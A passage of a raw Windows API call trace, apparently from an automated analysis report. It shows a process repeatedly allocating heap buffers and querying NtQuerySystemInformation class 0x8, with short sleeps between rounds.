Size=0xc0) returned 0x295cdb0 [0247.442] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0247.443] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.443] Sleep (dwMilliseconds=0x110) [0247.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0247.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0247.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0247.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0247.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0247.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0247.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0247.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0247.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.455] Sleep (dwMilliseconds=0x110) [0247.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0247.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.466] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0247.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0247.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0247.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0247.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0247.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0247.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0247.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.470] Sleep (dwMilliseconds=0x110) [0247.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0247.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0247.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0247.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0247.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0247.489] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0247.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0247.490] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0247.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.491] Sleep (dwMilliseconds=0x110) [0247.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0247.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0247.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0247.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0247.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0247.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0247.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0247.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0247.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.504] Sleep (dwMilliseconds=0x110) [0247.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0247.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0247.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0247.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0247.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0247.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0247.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0247.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0247.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.519] Sleep (dwMilliseconds=0x110) [0247.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0247.528] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0247.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0247.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0247.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0247.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0247.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0247.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0247.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.536] Sleep (dwMilliseconds=0x110) [0247.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0247.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0247.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0247.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0247.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0247.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0247.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0247.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0247.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.549] Sleep (dwMilliseconds=0x110) [0247.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0247.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0247.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0247.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0247.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0247.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0247.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0247.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0247.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.568] Sleep (dwMilliseconds=0x110) [0247.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0247.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0247.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0247.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0247.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0247.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0247.603] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0247.603] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.604] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0247.604] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.604] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.604] Sleep (dwMilliseconds=0x110) [0247.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0247.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0247.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0247.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0247.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0247.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0247.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0247.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0247.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.614] Sleep (dwMilliseconds=0x110) [0247.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0247.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0247.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0247.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0247.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0247.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0247.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0247.630] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0247.631] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.631] Sleep (dwMilliseconds=0x110) [0247.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0247.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0247.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0247.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0247.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0247.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0247.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0247.645] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0247.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.646] Sleep (dwMilliseconds=0x110) [0247.653] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0247.653] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0247.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0247.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0247.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0247.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0247.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0247.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0247.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.656] Sleep (dwMilliseconds=0x110) [0247.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0247.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0247.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0247.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0247.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0247.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 